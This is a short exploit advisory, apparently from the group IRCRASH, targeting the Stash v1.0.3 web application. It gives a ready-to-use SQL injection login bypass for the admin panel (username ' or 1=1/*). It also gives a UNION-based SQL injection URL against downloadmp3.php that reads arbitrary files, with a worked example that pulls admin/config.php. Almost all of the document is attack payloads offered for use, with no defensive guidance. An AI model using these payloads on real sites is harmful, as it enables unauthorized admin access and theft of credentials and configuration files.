Stash v1.0.3 Admin bypass / Remote File Disclosure
#####################################################################################
#### Stash v1.0.3 Admin bypass / Remote File Disclosure
####
#####################################################################################
#
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Our Site : Http://IRCRASH.COM
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
#####################################################################################
#
#
#Download :
http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
#
#
#DORK : :(
#
#
#
#####################################################################################
# [Admin by pass]
#
#
#
#http://Site/[path]/admin/login
#
#Username : ' or 1=1/*
#
#Password : R3d.W0rm
#
#
#
#####################################################################################
# [Remote File Disclosure]
#
#
#
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file
name in hex])/*
#
#
#Note : You must enter file name in hex in valun address to download it .
#
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870
#
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/*
#
#
#####################################################################################
# Site : Http://IRCRASH.COM
#
###################################### TNX GOD
######################################